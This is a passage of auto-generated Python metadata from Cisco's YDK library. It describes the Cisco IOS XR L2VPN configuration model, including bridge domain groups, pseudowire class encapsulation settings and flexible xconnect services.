_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
False,
[
_MetaInfoClassMember('bridge-domain', REFERENCE_LIST, 'BridgeDomain' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain',
[], [],
''' bridge domain
''',
'bridge_domain',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domains',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Bridge group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bridge-domains', REFERENCE_CLASS, 'BridgeDomains' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains',
[], [],
''' List of Bridge Domain
''',
'bridge_domains',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups',
False,
[
_MetaInfoClassMember('bridge-domain-group', REFERENCE_LIST, 'BridgeDomainGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup',
[], [],
''' Bridge group
''',
'bridge_domain_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'L2Tpv3SequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Tpv3SequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
False,
[
_MetaInfoClassMember('type-of-service-mode', REFERENCE_ENUM_CLASS, 'TypeOfServiceModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TypeOfServiceModeEnum',
[], [],
''' Type of service mode
''',
'type_of_service_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service-value', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Type of service value
''',
'type_of_service_value',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'type-of-service',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
False,
[
_MetaInfoClassMember('l2tpv3-class-name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the L2TPv3 class name
''',
'l2tpv3_class_name',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('protocol', REFERENCE_ENUM_CLASS, 'L2TpSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpSignalingProtocolEnum',
[], [],
''' L2TPv3 signaling protocol
''',
'protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable path MTU
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('max-path-mtu', ATTRIBUTE, 'int' , None, None,
[('68', '65535')], [],
''' Maximum path maximum transmission unit
''',
'max_path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'path-mtu',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
False,
[
_MetaInfoClassMember('cookie-size', REFERENCE_ENUM_CLASS, 'L2TpCookieSizeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2TpCookieSizeEnum',
[], [],
''' Cookie size
''',
'cookie_size',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('df-bit-set', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Set the do not fragment bit to 1
''',
'df_bit_set',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2TPv3 encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('path-mtu', REFERENCE_CLASS, 'PathMtu' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu',
[], [],
''' Path maximum transmission unit
''',
'path_mtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_CLASS, 'SignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol',
[], [],
''' L2TPv3 signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('time-to-live', ATTRIBUTE, 'int' , None, None,
[('1', '255')], [],
''' Time to live
''',
'time_to_live',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type-of-service', REFERENCE_CLASS, 'TypeOfService' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService',
[], [],
''' Type of service
''',
'type_of_service',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'l2tpv3-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
False,
[
_MetaInfoClassMember('disable-backup', ATTRIBUTE, 'int' , None, None,
[('0', '180')], [],
''' Disable backup delay
''',
'disable_backup',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'BackupDisableEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BackupDisableEnum',
[], [],
''' Delay or Never
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'backup-disable-delay',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
False,
[
_MetaInfoClassMember('resync-threshold', ATTRIBUTE, 'int' , None, None,
[('5', '65535')], [],
''' Out of sequence threshold
''',
'resync_threshold',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_ENUM_CLASS, 'MplsSequencingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSequencingEnum',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'sequencing',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
False,
[
_MetaInfoClassMember('redundancy-initial-delay', ATTRIBUTE, 'int' , None, None,
[('0', '120')], [],
''' Initial delay before activating the
redundant PW, in seconds
''',
'redundancy_initial_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('redundancy-one-way', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Force one-way PW redundancy behavior in
Redundancy Group
''',
'redundancy_one_way',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-redundancy',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
False,
[
_MetaInfoClassMember('fallback-disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Fallback disable
''',
'fallback_disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-tunnel-number', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Interface Tunnel number for preferred path
''',
'interface_tunnel_number',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('type', REFERENCE_ENUM_CLASS, 'PreferredPathEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PreferredPathEnum',
[], [],
''' Preferred Path Type
''',
'type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'preferred-path',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
False,
[
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance-code', REFERENCE_ENUM_CLASS, 'FlowLabelTlvCodeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelTlvCodeEnum',
[], [],
''' Enable Legacy Flow Label TLV code
''',
'flow_label_load_balance_code',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-label-load-balance', REFERENCE_ENUM_CLASS, 'LoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'LoadBalanceEnum',
[], [],
''' Enable PW Label based Load Balancing
''',
'pw_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'load-balance-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
False,
[
_MetaInfoClassMember('control-word', REFERENCE_ENUM_CLASS, 'ControlWordEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'ControlWordEnum',
[], [],
''' Enable control word
''',
'control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MPLS encapsulation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('load-balance-group', REFERENCE_CLASS, 'LoadBalanceGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup',
[], [],
''' Load Balancing
''',
'load_balance_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-redundancy', REFERENCE_CLASS, 'MplsRedundancy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy',
[], [],
''' Redundancy options for MPLS encapsulation
''',
'mpls_redundancy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('preferred-path', REFERENCE_CLASS, 'PreferredPath' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath',
[], [],
''' Preferred path
''',
'preferred_path',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pw-switching-tlv', REFERENCE_ENUM_CLASS, 'PwSwitchingPointTlvEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PwSwitchingPointTlvEnum',
[], [],
''' Pseudowire Switching Point Tlv
''',
'pw_switching_tlv',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('sequencing', REFERENCE_CLASS, 'Sequencing' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing',
[], [],
''' Sequencing
''',
'sequencing',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('signaling-protocol', REFERENCE_ENUM_CLASS, 'MplsSignalingProtocolEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MplsSignalingProtocolEnum',
[], [],
''' MPLS signaling protocol
''',
'signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Source IP address
''',
'source_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static-tag-rewrite', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' Static Tag rewrite
''',
'static_tag_rewrite',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('transport-mode', REFERENCE_ENUM_CLASS, 'TransportModeEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'TransportModeEnum',
[], [],
''' Transport mode
''',
'transport_mode',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vccv-type', REFERENCE_ENUM_CLASS, 'VccvVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'VccvVerificationEnum',
[], [],
''' VCCV verification type
''',
'vccv_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mpls-encapsulation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses.PseudowireClass' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses.PseudowireClass',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the pseudowire class
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('backup-disable-delay', REFERENCE_CLASS, 'BackupDisableDelay' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay',
[], [],
''' Back Up Pseudowire class
''',
'backup_disable_delay',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable pseudowire class
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('l2tpv3-encapsulation', REFERENCE_CLASS, 'L2Tpv3Encapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation',
[], [],
''' L2TPv3 encapsulation
''',
'l2tpv3_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mac-withdraw', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable backup MAC withdraw
''',
'mac_withdraw',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mpls-encapsulation', REFERENCE_CLASS, 'MplsEncapsulation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation',
[], [],
''' MPLS encapsulation
''',
'mpls_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-class',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.PseudowireClasses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.PseudowireClasses',
False,
[
_MetaInfoClassMember('pseudowire-class', REFERENCE_LIST, 'PseudowireClass' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.PseudowireClasses.PseudowireClass',
[], [],
''' Pseudowire class
''',
'pseudowire_class',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-classes',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Name of the attachment circuit interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuit', REFERENCE_LIST, 'VlanUnawareFxcAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit',
[], [],
''' Attachment circuit interface
''',
'vlan_unaware_fxc_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
False,
[
_MetaInfoClassMember('acid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' AC ID
''',
'acid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '65534')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpn',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns',
False,
[
_MetaInfoClassMember('vlan-unaware-fxc-pseudowire-evpn', REFERENCE_LIST, 'VlanUnawareFxcPseudowireEvpn' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn',
[], [],
''' EVPN FXC Service Configuration
''',
'vlan_unaware_fxc_pseudowire_evpn',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vlan-unaware-fxc-pseudowire-evpns',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 23)], [],
''' Name of the Flexible XConnect Service
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('vlan-unaware-fxc-attachment-circuits', REFERENCE_CLASS, 'VlanUnawareFxcAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits',
[], [],
''' List of attachment circuits
''',
'vlan_unaware_fxc_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
